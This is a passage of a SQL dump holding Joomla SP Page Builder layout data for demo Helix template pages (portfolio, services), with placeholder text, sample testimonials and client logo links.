Responsive\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-laptop\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":300,\"animationdelay\":200,\"class\":\"\"},\"attr\":[{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"50\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Unique Design\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-dashboard\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":300,\"animationdelay\":300,\"class\":\"\"},\"attr\":[{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"50\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Easy to Customize\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-gear\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":300,\"animationdelay\":400,\"class\":\"\"},\"attr\":[{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"50\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Awesome Support\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-envelope\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"background_attachment\":\"inherit\",\"fullscreen\":1,\"margin\":\"0px\",\"padding\":\"0px\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_position\":\"0 50%\",\"background_size\":\"contain\",\"background_repeat\":\"no-repeat\",\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"sortableitem\":\"[object Object]\",\"class\":\"\",\"animationdelay\":\"\",\"animationduration\":\"\",\"animation\":\"\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"attr\":[{\"name\":\"image_content\",\"title\":\"Image Content\",\"atts\":{\"image\":\"images/corporate.jpg\",\"image_alignment\":\"left\",\"title\":\"We Build our products to Represent our Values\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<br />The Helix Framework is one of the best light and feature rich responsive framework for Joomla templating. It is so easy to develop and control of Joomla templates for you and your clients. Helix framework will make your experience of creating website much smoother than ever before.<br /><br />It is so easy to develop and control of Joomla templates for you and your clients. Helix framework will make your experience of creating website much smoother than ever before.\",\"button_text\":\"\",\"button_url\":\"\",\"button_size\":\"\",\"button_type\":\"primary\",\"button_icon\":\"\",\"button_block\":\"\",\"button_target\":\"\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"0px 0px 0px\",\"padding\":\"100px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"#f5f5f5\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"zoomIn\",\"animationduration\":300,\"animationdelay\":300,\"class\":\"\"},\"attr\":[{\"name\":\"testimonialpro\",\"title\":\"Testimonial Pro\",\"atts\":{\"autoplay\":\"1\",\"arrows\":\"1\",\"class\":\"\"},\"scontent\":[{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Jony Daku\",\"avatar\":\"images/testimonial.png\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"Helix is a Awesome Framework for Joomla. It’s able me to easily customize the Joomla Templates Thanks to Helix Team. Really Appreciate it.\",\"url\":\"\"}},{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Michel Cattar\",\"avatar\":\"images/testimonial.png\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"Helix is a Awesome Framework for Joomla. It’s able me to easily customize the Joomla Templates Thanks to Helix Team. Really Appreciate it.\",\"url\":\"\"}},{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Nanchel Culy\",\"avatar\":\"images/testimonial.png\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"Helix is a Awesome Framework for Joomla. It’s able me to easily customize the Joomla Templates Thanks to Helix Team. Really Appreciate it.\",\"url\":\"\"}}]}]}]},{\"type\":\"sp_row\",\"layout\":\"3333\",\"settings\":{\"title\":\"\",\"heading_selector\":\"h1\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"images/client-bg.png\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"inherit\",\"background_position\":\"50% 50%\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"70px 0\",\"margin\":\"0px\",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"zoomIn\",\"animationduration\":400,\"animationdelay\":300,\"class\":\"\",\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"image\",\"title\":\"Image\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/client1.png\",\"position\":\"sppb-text-center\",\"link\":\"http://www.joomshaper.com/\",\"target\":\"\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"zoomIn\",\"animationduration\":400,\"animationdelay\":450,\"class\":\"\"},\"attr\":[{\"name\":\"image\",\"title\":\"Image\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/client2.png\",\"position\":\"sppb-text-center\",\"link\":\"http://www.joomshaper.com/\",\"target\":\"\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"zoomIn\",\"animationduration\":400,\"animationdelay\":600,\"class\":\"\"},\"attr\":[{\"name\":\"image\",\"title\":\"Image\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/client3.png\",\"position\":\"sppb-text-center\",\"link\":\"http://www.joomshaper.com/\",\"target\":\"\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3 active-column-parent\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"zoomIn\",\"animationduration\":400,\"animationdelay\":750,\"class\":\"\"},\"attr\":[{\"name\":\"image\",\"title\":\"Image\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/client4.png\",\"position\":\"sppb-text-center\",\"link\":\"http://www.joomshaper.com/\",\"target\":\"\",\"class\":\"\"},\"scontent\":[]}]}]}]','com_sppagebuilder','page',0,0,-2,0,1,0,'2015-01-22 07:12:35',391,'2015-03-02 11:21:57',133,0,'0000-00-00 00:00:00','[]','','','','*',2,''),(3,0,'Portfolio','[{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"title\":\"\",\"heading_selector\":\"h1\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"#049bef\",\"color\":\"\",\"background_image\":\"\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"inherit\",\"background_position\":\"50% 50%\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"100px 0px 0px\",\"margin\":\"\",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12 active-column-parent\",\"settings\":{\"sortableitem\":\"[object Object]\",\"class\":\"\",\"animationdelay\":\"\",\"animationduration\":\"\",\"animation\":\"\",\"padding\":\"\",\"color\":\"#ffffff\",\"background\":\"\"},\"attr\":[{\"name\":\"call_to_action\",\"title\":\"Call to Action\",\"atts\":{\"title\":\"Helix V3 Portfolio Layout\",\"heading_selector\":\"h3\",\"title_fontsize\":\"48\",\"title_text_color\":\"#ffffff\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"subtitle_text_color\":\"#ffffff\",\"text\":\"\",\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"button_text\":\"Download Now\",\"button_url\":\"#\",\"button_size\":\"lg\",\"button_type\":\"default\",\"button_icon\":\"\",\"button_block\":\"\",\"button_target\":\"\",\"button_position\":\"bottom\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"100\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"image\",\"title\":\"Image\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/showcase/portfolio-banner.png\",\"position\":\"sppb-text-center\",\"link\":\"#\",\"target\":\"\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":\"3333\",\"settings\":{\"title\":\"\",\"heading_selector\":\"h2\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":0,\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"\",\"margin\":\"100px 0 \",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"sortableitem\":\"[object Object]\",\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":\"\",\"animationdelay\":\"\",\"class\":\"\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Fully Responsive\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-laptop\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Unique Design\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-dashboard\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Easy to Customize\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-gear\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Awesome Support\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-envelope\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":1,\"margin\":\"100px 0px 0px\",\"padding\":\"\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"title_position\":\"sppb-text-center\",\"subtitle_fontsize\":\"\",\"subtitle\":\"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip\\n\\n\\n\",\"title_margin_bottom\":20,\"title_margin_top\":0,\"title_text_color\":\"#333333\",\"title_fontsize\":36,\"heading_selector\":\"h2\",\"title\":\"Showcase\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{},\"attr\":[{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"30\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"module\",\"title\":\"Joomla Module\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"id\":\"98\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"0px 0px 0px\",\"padding\":\"100px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"#fafafa\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{},\"attr\":[{\"name\":\"testimonialpro\",\"title\":\"Testimonial Pro\",\"atts\":{\"autoplay\":\"1\",\"arrows\":\"1\",\"class\":\"\"},\"scontent\":[{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Jony Daku\",\"avatar\":\"images/testimonial.png\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"Helix is a Awesome Framework for Joomla. It’s able me to easily customize the Joomla Templates Thanks to Helix Team. Really Appreciate it.\",\"url\":\"\"}},{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Michel Cattar\",\"avatar\":\"images/testimonial.png\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"Helix is a Awesome Framework for Joomla. It’s able me to easily customize the Joomla Templates Thanks to Helix Team. Really Appreciate it.\",\"url\":\"\"}},{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Nanchel Culy\",\"avatar\":\"images/testimonial.png\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"Helix is a Awesome Framework for Joomla. It’s able me to easily customize the Joomla Templates Thanks to Helix Team. Really Appreciate it.\",\"url\":\"\"}}]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"title\":\"\",\"heading_selector\":\"h1\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"images/cta_bg.jpg\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"inherit\",\"background_position\":\"50% 50%\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"100px 0px\",\"margin\":\"0px\",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":\"\",\"animationdelay\":\"\",\"class\":\"\"},\"attr\":[{\"name\":\"call_to_action\",\"title\":\"Call to Action\",\"atts\":{\"title\":\"Ready to our latest creation Helix III\",\"heading_selector\":\"h2\",\"title_fontsize\":\"36\",\"title_text_color\":\"#ffffff\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"30\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"subtitle_text_color\":\"#ffffff\",\"text\":\"\",\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"button_text\":\"Download\",\"button_url\":\"#\",\"button_size\":\"lg\",\"button_type\":\"primary\",\"button_icon\":\"\",\"button_block\":\"\",\"button_target\":\"\",\"button_position\":\"bottom\",\"class\":\"\"},\"scontent\":[]}]}]}]','com_sppagebuilder','page',0,0,-2,0,1,0,'2015-01-22 07:12:35',391,'2015-02-03 06:17:16',864,0,'0000-00-00 00:00:00','[]','','','','*',0,''),(4,0,'Services','[{\"type\":\"sp_row\",\"layout\":\"444\",\"settings\":{\"fullscreen\":0,\"margin\":\"100px 0 \",\"padding\":\"\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"title_position\":\"sppb-text-center\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":0,\"title_text_color\":\"\",\"title_fontsize\":\"\",\"heading_selector\":\"h2\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-4\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":\"\",\"animationdelay\":\"\",\"class\":\"\",\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Fully Responsive\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-laptop\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"50\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Well Documentattion\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-book\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-4\",\"settings\":{\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Unique Design\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-dashboard\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"50\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Page Builder\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-arrows\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-4\",\"settings\":{\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Easy to Customize\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-gear\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"50\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Dedicated Support\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-users\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"0px\",\"padding\":\"60px 0px\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_position\":\"50% 